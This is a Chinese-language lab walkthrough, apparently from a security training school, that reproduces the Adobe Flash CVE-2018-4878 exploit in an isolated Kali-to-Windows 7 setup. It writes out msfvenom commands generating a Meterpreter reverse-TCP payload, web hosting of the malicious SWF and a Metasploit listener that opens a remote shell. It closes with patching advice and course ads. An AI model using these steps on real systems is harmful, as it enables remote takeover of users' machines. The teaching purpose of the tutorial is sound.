


Adobe Flash 是全球流行的多媒体播放器,用户量高达数十亿,可以实现浏览器端丰富的内容展现,包括但不限于音视频、小游戏、交互内容等等。
尽管 Adobe 官方宣布接下来会逐步停止 Flash 插件的更新和维护,但不可否认的是,现行互联网上仍然有大规模的网站和浏览器客户端,仍然基于 Flash 来展现内容。
Adobe 与微软类似,这两家可以说是难兄难弟,经常喜提“漏洞全家桶”,近年来各种高危0day 漏洞满天飞。
毕竟“人红是非多”,这种用户量过亿的产品及漏洞,但凡有风吹草动,无论是明面上的「安全研究员」还是底下的「骇客」,都一定盯着不放。
这不,2018 年 2 月 1 号,Adobe 官方发布安全通报(APSA18-01),声明 Adobe Flash Player 28.0.0.137 及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的 Flash 链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被 Getshell,真正实现“一点中招”。在实际的Hacking工作中,无论是水坑还是鱼叉式攻击,这枚漏洞还是经常被用上。
直到2018年2月5号,Adboe才发布补丁来修复此 0 day 漏洞。

vx:pinginglab 官网:pinginglab.net
互联网上出现的基于此 Flash 0day 漏洞进行攻击的样本,其实在2017年底就已经由韩国计算机应急小组(KR-CERT)首次发现。也就是说,这枚漏洞其实已经被利用了很长一段时间,只不过之前官方一直没发现而已。
目前,全网已经有比较成熟的针对此 Flash 漏洞的利用代码,接下来我们一起来复现整个过程。
渗透机:Kali Linux (ip:172.16.70.216)
靶机:Windows 7 sp1 (ip:172.16.70.199)
exp:cve-2018-4878.py
flash:flashplayer_activex_28.0.0.137.exe
注1:为了节省大家实验时间,此测试环境已打包好。获取方式: 关注公众号[拼客学院服务号](搜索pinginglab),回复关键词:CVE-2018-4878
注2:实验环境仅供个人学习测试,为防止被河蟹,请勿转发链接。

vx:pinginglab 官网:pinginglab.net
① 将网盘中的 CVE-2018-4878-master 目录下载下来,并放入 Kali Linux 桌面

vx:pinginglab 官网:pinginglab.net
②使用 msfvenom 生成 shell 代码
生成代码,其中lhost为kali的ip地址,lport为自定义的端口号
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888 -f python>shellcode.txt

vx:pinginglab 官网:pinginglab.net
查看代码文件
root@kali:~# cat shellcode.txt

vx:pinginglab 官网:pinginglab.net
③ 进入 CVE-2018-4878-master 目录,编辑 CVE-2018-4878.py 文件
将上面 msfvenom 生成的代码覆盖掉原来的代码:

vx:pinginglab 官网:pinginglab.net
修改 CVE-2018-4878.py 下面的文件信息(后面会用到,之后保存修改退出):

vx:pinginglab 官网:pinginglab.net
④ Kali Linux进入CVE-2018-4878-master 路径,用 Python 执行CVE-2018-4878-master.py代码
root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py root@kali:~/Desktop/CVE-2018-4878-master# ls -l

vx:pinginglab 官网:pinginglab.net
⑤ Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)
root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf

vx:pinginglab 官网:pinginglab.net
此时,Kali Linux 上 Web 服务启动,并且具备 index2.html 这个页面。只要靶机启用 flash 并访问了这个页面,则可以直接被控制。
⑥Kali Linux开启Shell会话监听
使用handler监听模块
msf > use exploit/multi/handler
回弹一个tcp连接
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
设置kali渗透机的ip地址
msf exploit(handler) > set lhost 172.16.70.216
设置监听端口,这个需跟上面msfvenom设置的端口一致
msf exploit(handler) > set lport 8888
开启监听,等待肉鸡上线
msf exploit(handler) > exploit

vx:pinginglab 官网:pinginglab.net
⑦ Windows7 安装 flash 插件,并用 IE 浏览器访问页面
搜索 flash 最新的28版本

vx:pinginglab 官网:pinginglab.net
安装flash插件

vx:pinginglab 官网:pinginglab.net
使用 Win7 内置 IE 8 浏览器访问页面:http://172.16.70.216/index2.html

vx:pinginglab 官网:pinginglab.net
⑧ Kali Linux 上获取 meterpreter shell,并进行管理

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net
可以看到,最终由于 Flash 存在 CVE-2018-4878 这个高危漏洞,导致 Windows 靶机访问含flash 的页面时,直接被 Kali Linux 控制。
真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果。
在这里呼吁大家:
平常要非常小心陌生链接,类似这种“一点就中招”的高级渗透攻击,肯定还有很多没有浮出水面。像这个 2017 年其实已经出现的漏洞,早就有黑客已经在使用了,而中招者完全不知情,整个攻击手法非常隐蔽。而 2018 年2月才有安全补丁,在这期间,有多少肉鸡被控制,这个难以想象。很多0day漏洞,黑客比大部分人都要提前知晓,在安全厂商没有出安全公告,或者没有打安全补丁的情况下,一个不小心,就会导致电脑被劫持,数据被窃取,造成极大的损失。
① 直接到Adobe Flash官网,下载最新版本:https://get.adobe.com/cn/flashplayer/
② 安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。
【up主介绍】
陈鑫杰 拼客科技CEO / 拼客学院院长
多年一线互联网 / 金融 / 政府信息安全技术支撑
擅长网络安全 / Web安全 / 渗透测试 / 数字取证
网警技术顾问 / 多次协助抓获大型诈骗团伙
腾讯安全合作伙伴 / 共同打击灰黑产非法犯罪
51CTO金牌讲师 / 330万+学员 / 安全类Top1
知乎专栏作家 / bilibili知识领域优质up主
人邮签约作者 / 曾出版高等院校指定教材
【精选内容】
① 关于网络安全行业的一切,如何成为一名合格的白帽子黑客?网络安全-Web安全-渗透测试必备指南
② 零基础如何学习Web安全渗透测试?推荐这份史上最详细的自学路线图!
③ 网络安全到底在干啥?搞网络安全就是搞“黑客技术”?聊聊网络安全的知识体系和学习方向
④ B站最壕“搞机”?曝光百万级网络安全实验室!防火墙入侵防御漏洞扫描等都齐了!
⑤ 作为一名白帽子黑客,如何打造自己的网络安全“军火库”?
【精选班级】
①《全栈渗透测试定向人才班》拼客学院 x 奇安信 | 直播 + 面授 网页链接
②《100天晋升Web白帽子黑客》https://www.pinginglab.net/classroom/12/introduction
③《全栈网络安全专家》https://www.pinginglab.net/classroom/11/introduction
【了解更多】
班主任vx:qiuzhiquanquan、tangtangbzr(添加时请备注“B站”)
vx公众号:拼客学院服务号(ID:pinginglab) 拼客院长陈鑫杰(ID:pingsec)
学院官网:www.pinginglab.net(专注网络安全/Python开发/Linux云计算/大数据)